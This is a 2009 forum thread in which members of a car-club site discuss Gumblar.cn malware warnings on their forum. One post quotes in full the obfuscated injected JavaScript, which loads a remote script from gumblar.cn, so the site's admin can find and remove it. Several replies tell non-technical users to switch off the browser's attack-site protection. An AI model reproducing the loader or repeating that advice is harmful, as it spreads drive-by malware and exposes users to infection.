Forums suffering virus/trojan infection

[riske]

im using the google chrome on my laptop now and just trid blocking me cos of gamblar.cn shit thing. But on mozilla its all good?? ill do some checks and download some more spyware crap and antivirus

 

[GTiR-Aholic]

Rishi, use the link below for information on the gumblar.cn phishing script.. it tells you what to look for in your blog pages so that you know which lines of code to remove and if you have a good known backup .. you can restore those pages easily enough hopefully without sacraficing the database.

http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

I done a quick search on the source code for the page: gtiroc.com/forums/showthread.php and found the following phishing script which gumblar.cn uses:

<script language=javascript><!--
(function(uAJd){var WVyrT=('v:61r:20a:3d:22Script:45n:67ine:22:2cb:3d:22:56e:72:73ion()+:22:2cj:3d:22:22:2c:75:3dnavigat:6f:72:2euser:41:67ent:3bif((u:2eind:65xO:6622:57in:22:29:3e0):26:26(u:2einde:78Of22NT:206:22:29:3c0):26:26:28d:6fc:75ment:2e:63:6f:6f:6bie:2eind:65xO:66:28:22mie:6b:3d1:22):3c0):26:26(typeof7arv:7ats):21:3d:74ypeof22A:22):29):7bzrvzts:3d:22A:22:3be:76a:6c22:69f77i:6edow:2e:22+a+:22)j:3d:6a+:22:2ba+:22Major:22+:62+a+:22Min:6fr:22+b+:61+:22:42:75:69ld:22+b+:22j:3b:22):3bdoc:75ment:2ew:72:69t:6522:3csc:72:69p:74:20sr:63:3d:2f:2fgu:6dblar:2e:63n:2frs:73:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73:63r:69p:74:3e:22:29:3b:7d').replace(uAJd,'%');var y8FVs=unescape(WVyrT);eval(y8FVs)})(/:/g);
--></script>


it's just before the </head> tag and will most likely be in more than 1 php file.. ftp in and delete it from all the php files under /forums/ then lets try the site again and see if it still happens

 

[GTiR-Aholic]

sorry meant after </head> tag (not before), but before <body> tag

 

[Rishi]

I've been looking for answers to this for ages.. I've got all the files i need to replace but i need to take a complete backup (not just a DB backup) which i will need to do on Wednesday when i am back on a fast connection..

 

[GTiR-Aholic]

No probs dude, until then I will run this site whilst my speakers are on mute because everytime I load a new page the kaspersky security centre screams like a bitch!!! lol

 

[jjs]

hi usually log on to this site at work, will no longer let me log on, comes up with trojan virus , redirecting, work uses macafee virus software , any ideas, also when i log on at home , keeps saying redirecting, doesnt automatically log on like it used to.

 

[GTiR-Aholic]

yeah check 2 posts up.. I put a link in the post with information regarding the problem, Rishi will be sorting it soon hopefully this week
If it asks you to allow/decline the "gumblar.cn" script just click decline.. it should still load the page but will not allow the script to access your private data i.e. passwords etc.

 

[Tim]

Even my mac is now warning me of malware on this site ... if Rishi is too busy to sort this, i don't mind helping out.

 

[gtirjoey]

I dont really know anything about computers but if i load up mozilla and try gtiroc.com it blocks the site and says google has found harmful software on this website.

 

[saddler]

I dont really know anything about computers but if i load up mozilla and try gtiroc.com it blocks the site and says google has found harmful software on this website.

go into tools options and untick (tell me if the site is visiting is a supected attack site)

 

[gtirjoey]

untick what mate sorry im a dumbass with computers

 

[gtirjoey]

when i load gtiroc it will not load it comes up reported attack site does that help?

 

[saddler]

untick what mate sorry im a dumbass with computers

click on tools and then options

yours will be ticked !! untick and you should be ok !!

 

[gtiroz]

just for admin/tech reference:

on a mac running 10.5.x using firefox 3.x
have been browsing daily but warnings only started in the last 24 hours...

(turning off the firefox security works as per above wintel procedure)

 

[JIMMYBACK]

i m getting the same issue i sent a copy the error to rishi hopefully there is a fix

 

[snoon]

happened to me for the first time today too

 

[GTiR-Aholic]

first time you've got any error at all? - You need to update your virus scanner or get a better one!

happened to me for the first time today too

 

[GTIR-LOZ]

it does it on my main computer using avast, using avg onlaptop and its fine

 

[gtirjoey]

first time i had an error yesterday....got no spyware or anything like probably why

 

[riske]

Safe Browsing
Diagnostic page for gtiroc.com

What is the current listing status for gtiroc.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 146 pages we tested on the site over the past 90 days, 14 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-15, and the last time suspicious content was found on this site was on 2009-05-15.
Malicious software includes 57 scripting exploit(s).

Malicious software is hosted on 1 domain(s), including gumblar.cn/.

This site was hosted on 1 network(s) including AS15244 (ADDD2NET).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gtiroc.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.




Latest update of what i keep getting